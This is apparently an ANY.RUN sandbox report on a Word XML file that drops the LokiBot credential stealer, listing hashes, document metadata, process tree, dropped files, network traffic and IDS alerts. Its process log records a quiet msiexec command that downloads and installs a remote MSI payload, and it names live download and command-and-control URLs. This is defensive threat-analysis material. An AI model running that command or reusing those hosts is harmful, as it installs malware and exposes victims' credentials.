analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0

Full analysis: https://app.any.run/tasks/569bcfaa-8cfa-40f7-a55c-7b3600f1872d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 06:53:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
exe-to-msi
loader
lokibot
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

D3265BF4490965C523CFD235990E2DE3

SHA1:

DBF3A4E9DDE6100B521827D71354C57093FFE0BD

SHA256:

AC1B391230816B46484610A4B474EB4D0996EEF57B0A147F341297204CD191F0

SSDEEP:

3072:eI3HHjWUU38bONpQYDmbmvDuBUKTrXraCtHlpORaAs/vUEMVXpKxq:tjWUNONNrSBUKTrOwl0hsXUEM9b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2932)
    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 1264)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1264)
    • LOKIBOT was detected

      • MSI4F66.tmp (PID: 1588)
    • Connects to CnC server

      • MSI4F66.tmp (PID: 1588)
    • Detected artifacts of LokiBot

      • MSI4F66.tmp (PID: 1588)
    • Actions looks like stealing of personal data

      • MSI4F66.tmp (PID: 1588)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2932)
      • MSI4F66.tmp (PID: 1588)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2932)
    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3884)
    • Loads DLL from Mozilla Firefox

      • MSI4F66.tmp (PID: 1588)
    • Creates files in the user directory

      • MSI4F66.tmp (PID: 1588)
  • INFO

    • Application was dropped or rewritten from another process

      • MSI4F66.tmp (PID: 2192)
      • MSI4F66.tmp (PID: 1588)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2932)
      • MSI4F66.tmp (PID: 2192)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2932)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1264)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1264)
    • Application launched itself

      • MSI4F66.tmp (PID: 2192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels | Open Office XML Relationships (28.2)
.xml | Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg | Scalable Vector Graphics (var.3) (4.5)
.xml | Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartXmlDataWebSettingsAllowPNG: -
PackagePartXmlDataWebSettingsOptimizeForBrowser: -
PackagePartXmlDataWebSettingsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataFontsFontSigCsb1: 00000000
PackagePartXmlDataFontsFontSigCsb0: 000001FF
PackagePartXmlDataFontsFontSigUsb3: 00000000
PackagePartXmlDataFontsFontSigUsb2: 00000009
PackagePartXmlDataFontsFontSigUsb1: C000247B
PackagePartXmlDataFontsFontSigUsb0: E0002AFF
PackagePartXmlDataFontsFontPitchVal: variable
PackagePartXmlDataFontsFontFamilyVal: swiss
PackagePartXmlDataFontsFontCharsetVal: 00
PackagePartXmlDataFontsFontPanose1Val: 020F0502020204030204
PackagePartXmlDataFontsFontName: Calibri
PackagePartXmlDataFontsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataCorePropertiesModified: 2018:11:06 18:40:00Z
PackagePartXmlDataCorePropertiesModifiedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated: 2018:11:06 18:40:00Z
PackagePartXmlDataCorePropertiesCreatedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesRevision: 1
PackagePartXmlDataCorePropertiesLastModifiedBy: Central
PackagePartXmlDataCorePropertiesDescription: -
PackagePartXmlDataCorePropertiesKeywords: -
PackagePartXmlDataCorePropertiesCreator: Central
PackagePartXmlDataCorePropertiesSubject: -
PackagePartXmlDataCorePropertiesTitle: -
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: -
PackagePartXmlDataStylesStyleTblPrTblIndType: dxa
PackagePartXmlDataStylesStyleTblPrTblIndW: -
PackagePartXmlDataStylesStyleUnhideWhenUsed: -
PackagePartXmlDataStylesStyleSemiHidden: -
PackagePartXmlDataStylesStyleUiPriorityVal: 1
PackagePartXmlDataStylesStyleQFormat: -
PackagePartXmlDataStylesStyleNameVal: Normal
PackagePartXmlDataStylesStyleStyleId: Normal
PackagePartXmlDataStylesStyleDefault: 1
PackagePartXmlDataStylesStyleType: paragraph
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: -
PackagePartXmlDataStylesLatentStylesLsdExceptionName: Normal
PackagePartXmlDataStylesLatentStylesCount: 375
PackagePartXmlDataStylesLatentStylesDefQFormat: -
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: -
PackagePartXmlDataStylesLatentStylesDefSemiHidden: -
PackagePartXmlDataStylesLatentStylesDefUIPriority: 99
PackagePartXmlDataStylesLatentStylesDefLockedState: -
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: auto
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: 259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: 160
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: ar-SA
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: minorHAnsi
PackagePartXmlDataStylesIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataPropertiesAppVersion: 16
PackagePartXmlDataPropertiesHyperlinksChanged: -
PackagePartXmlDataPropertiesSharedDoc: -
PackagePartXmlDataPropertiesCharactersWithSpaces: 1
PackagePartXmlDataPropertiesLinksUpToDate: -
PackagePartXmlDataPropertiesCompany: -
PackagePartXmlDataPropertiesScaleCrop: -
PackagePartXmlDataPropertiesParagraphs: 1
PackagePartXmlDataPropertiesLines: 1
PackagePartXmlDataPropertiesDocSecurity: -
PackagePartXmlDataPropertiesApplication: Microsoft Office Word
PackagePartXmlDataPropertiesCharacters: 1
PackagePartXmlDataPropertiesWords: -
PackagePartXmlDataPropertiesPages: 1
PackagePartXmlDataPropertiesTotalTime: -
PackagePartXmlDataPropertiesTemplate: Normal
PackagePartXmlDataPropertiesXmlns: http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataSettingsDocIdVal: {D24C6EB6-1E40-4F8D-93E2-A1BBB0912DFA}
PackagePartXmlDataSettingsChartTrackingRefBased: -
PackagePartXmlDataSettingsListSeparatorVal: ,
PackagePartXmlDataSettingsDecimalSymbolVal: .
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: 1
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: 1026
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: edit
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: followedHyperlink
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: hyperlink
PackagePartXmlDataSettingsClrSchemeMappingAccent6: accent6
PackagePartXmlDataSettingsClrSchemeMappingAccent5: accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent4: accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent3: accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent2: accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent1: accent1
PackagePartXmlDataSettingsClrSchemeMappingT2: dark2
PackagePartXmlDataSettingsClrSchemeMappingBg2: light2
PackagePartXmlDataSettingsClrSchemeMappingT1: dark1
PackagePartXmlDataSettingsClrSchemeMappingBg1: light1
PackagePartXmlDataSettingsThemeFontLangVal: en-US
PackagePartXmlDataSettingsMathPrNaryLimVal: undOvr
PackagePartXmlDataSettingsMathPrIntLimVal: subSup
PackagePartXmlDataSettingsMathPrWrapIndentVal: 1440
PackagePartXmlDataSettingsMathPrDefJcVal: centerGroup
PackagePartXmlDataSettingsMathPrRMarginVal: -
PackagePartXmlDataSettingsMathPrLMarginVal: -
PackagePartXmlDataSettingsMathPrDispDef: -
PackagePartXmlDataSettingsMathPrSmallFracVal: -
PackagePartXmlDataSettingsMathPrBrkBinSubVal: --
PackagePartXmlDataSettingsMathPrBrkBinVal: before
PackagePartXmlDataSettingsMathPrMathFontVal: Cambria Math
PackagePartXmlDataSettingsRsidsRsidVal: 00380709
PackagePartXmlDataSettingsRsidsRsidRootVal: 00380709
PackagePartXmlDataSettingsCompatCompatSettingVal: 15
PackagePartXmlDataSettingsCompatCompatSettingUri: http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingName: compatibilityMode
PackagePartXmlDataSettingsCharacterSpacingControlVal: doNotCompress
PackagePartXmlDataSettingsDefaultTabStopVal: 720
PackagePartXmlDataSettingsZoomPercent: 100
PackagePartXmlDataSettingsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: 56
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: 00
PackagePartXmlDataVbaSuppDataMcdsMcdName: Project.fVUd6uvDCPAiB5HGwC.S7Fs5W_GWzdOIQ4ueRqa
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: PROJECT.FVUD6UVDCPAIB5HGWC.S7FS5W_GWZDOIQ4UERQA
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: -
PackagePartXmlDataVbaSuppDataIgnorable: w14 w15 w16se w16cid wp14
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: {4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataThemeExtLstExtThemeFamilyId: {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyName: Office Theme
PackagePartXmlDataThemeExtLstExtUri: {05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtraClrSchemeLst: -
PackagePartXmlDataThemeObjectDefaults: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: 93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: 170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: 95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: 63000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: 000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: 19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: 57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: -
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: 800000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: 6350
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 100000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: 67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeName: Office
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: 游明朝
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: 020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: 游ゴシック Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: 020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeName: Office
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: 954F72
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: 0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: 70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: 5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: 4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: 44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: window
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: 000000
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: windowText
PackagePartXmlDataThemeThemeElementsClrSchemeName: Office
PackagePartXmlDataThemeName: Office Theme
PackagePartCompression: store
PackagePartBinaryData: (Binary data 46942 bytes, use -b option to extract)
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: 360
PackagePartXmlDataDocumentBodySectPrColsSpace: 720
PackagePartXmlDataDocumentBodySectPrPgMarGutter: -
PackagePartXmlDataDocumentBodySectPrPgMarFooter: 720
PackagePartXmlDataDocumentBodySectPrPgMarHeader: 720
PackagePartXmlDataDocumentBodySectPrPgMarLeft: 1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom: 1440
PackagePartXmlDataDocumentBodySectPrPgMarRight: 1440
PackagePartXmlDataDocumentBodySectPrPgMarTop: 1440
PackagePartXmlDataDocumentBodySectPrPgSzH: 15840
PackagePartXmlDataDocumentBodySectPrPgSzW: 12240
PackagePartXmlDataDocumentBodySectPrRsidR: 00380709
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst: rect
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri: {28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed: rId5
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri: http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName: Picture 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom: paragraph
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom: column
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight: 251658240
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR: 114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL: 114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT: -
PackagePartXmlDataDocumentBodyPRRPrNoProof: -
PackagePartXmlDataDocumentBodyPBookmarkEndId: -
PackagePartXmlDataDocumentBodyPBookmarkStartName: _GoBack
PackagePartXmlDataDocumentBodyPBookmarkStartId: -
PackagePartXmlDataDocumentBodyPRsidRDefault: 00380709
PackagePartXmlDataDocumentBodyPRsidR: 00380709
PackagePartXmlDataDocumentIgnorable: w14 w15 w16se w16cid wp14
PackagePartXmlDataRelationshipsRelationshipTarget: docProps/app.xml
PackagePartXmlDataRelationshipsRelationshipType: http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipId: rId3
PackagePartXmlDataRelationshipsXmlns: http://schemas.openxmlformats.org/package/2006/relationships
PackagePartPadding: 512
PackagePartContentType: application/vnd.openxmlformats-package.relationships+xml
PackagePartName: /_rels/.rels
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start msoxmled.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe msi4f66.tmp no specs #LOKIBOT msi4f66.tmp

Process information

PID
CMD
Path
Indicators
Parent process
3884"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
1264"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
916msiexec.exe /i http://socaleights.com//images/2014/jzfdyijsh.msi /quietC:\Windows\system32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2932C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2192"C:\Windows\Installer\MSI4F66.tmp"C:\Windows\Installer\MSI4F66.tmpmsiexec.exe
User:
admin
Company:
05becd92-1cea-493
Integrity Level:
MEDIUM
Description:
7686b9e3-e106-48c
Exit code:
0
Version:
20.77.130.168
1588"C:\Windows\Installer\MSI4F66.tmp"C:\Windows\Installer\MSI4F66.tmp
MSI4F66.tmp
User:
admin
Company:
05becd92-1cea-493
Integrity Level:
MEDIUM
Description:
7686b9e3-e106-48c
Version:
20.77.130.168
Total events
1 446
Read events
795
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
2
Text files
12
Unknown types
8

Dropped files

PID
Process
Filename
Type
1264WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR36AB.tmp.cvr
MD5:
SHA256:
2932msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF80A74F7450274096.TMP
MD5:
SHA256:
2932msiexec.exeC:\Config.Msi\184e2d.rbs
MD5:
SHA256:
2932msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF2E78471749F551A9.TMP
MD5:
SHA256:
1264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml.LNKlnk
MD5:3CE80BD1B92730C5FCBBF57040B011C1
SHA256:456E5C7896C1B197C243C00CFBC0EC652C5DC5A9E3478AD4D643131745BB8BCB
1588MSI4F66.tmpC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
1264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:06B76C26FB27A31061DFED5941FB1E60
SHA256:DA1C92041E264C8CD622FF7EA35868F9C4D5E8CDE1B8EEA7B34DA89139E0C643
2932msiexec.exeC:\Windows\Installer\MSI4C46.tmpexecutable
MD5:8B70F3D86655835F7049AB38C44D7C51
SHA256:AD817BD5A7508402452D84A552CFB44361889FE0E57BCBE41015F88C639BB78F
1264WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B9E6229565BD24A82ECF8A0A8530CBBB
SHA256:1FDDF7CF39E3BE711F46BFD660925D1B10044138A9456BDEBBD5991DC955DB17
2932msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:B9E14479D684F9DB849275F008472756
SHA256:AAC73B156CF171C1B8AE3441CAB695FB1457A1B085B96E96FE89A8C871734BBC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1588
MSI4F66.tmp
POST
209.182.209.40:80
http://parkerhdd.com/wp-admin/network/five/fre.php
US
malicious
1588
MSI4F66.tmp
POST
209.182.209.40:80
http://parkerhdd.com/wp-admin/network/five/fre.php
US
malicious
2932
msiexec.exe
GET
200
23.229.196.4:80
http://socaleights.com//images/2014/jzfdyijsh.msi
US
executable
964 Kb
malicious
1588
MSI4F66.tmp
POST
209.182.209.40:80
http://parkerhdd.com/wp-admin/network/five/fre.php
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1588
MSI4F66.tmp
209.182.209.40:80
parkerhdd.com
InMotion Hosting, Inc.
US
malicious
2932
msiexec.exe
23.229.196.4:80
socaleights.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
socaleights.com
  • 23.229.196.4
malicious
parkerhdd.com
  • 209.182.209.40
malicious

Threats

PID
Process
Class
Message
2932
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2932
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2932
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1588
MSI4F66.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
1588
MSI4F66.tmp
A Network Trojan was detected
